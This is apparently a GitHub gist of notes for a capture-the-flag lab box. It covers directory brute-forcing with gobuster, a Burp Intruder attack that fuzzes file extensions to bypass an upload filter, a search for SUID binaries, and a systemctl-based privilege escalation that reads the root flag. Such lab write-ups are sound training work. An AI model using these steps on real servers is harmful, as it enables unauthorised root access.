Created
October 9, 2021 21:42
-
-
Save adrianodias8/ec85ac08cb5a8468cf64f0b3913f3aed to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Locate directory GoBuster | |
| - gobuster dir -u http://10.10.239.220:3333 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt | |
| Compromise server with burp | |
| - upload file with burp browser | |
| - send request to intruder + in positions select sniper attack add § to file extension | |
| - in payloads add list of file extensions to test + disable payload encoding (at least for this playground) | |
| Serch for SUID (set owner userId upon execution) | |
| - find / -user root -perm -4000 -exec ls -ldb {} \; | |
| For PrivEsc and get root flag | |
| - use slight adaptation of https://gtfobins.github.io/gtfobins/systemctl/ | |
| $ TF=$(mktemp).service | |
| $ echo '[Service] | |
| > Type=oneshot | |
| > ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/flag.txt" | |
| > [Install] | |
| > WantedBy=multi-user.target' > $TF | |
| $ /bin/systemctl enable --now $TF | |
| Created symlink from /etc/systemd/system/multi-user.target.wants/tmp.Cg5cdXxfsZ.service to /tmp/tmp.Cg5cdXxfsZ.service. | |
| Created symlink from /etc/systemd/system/tmp.Cg5cdXxfsZ.service to /tmp/tmp.Cg5cdXxfsZ.service. | |
| $ cat /tmp/flag.txt | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment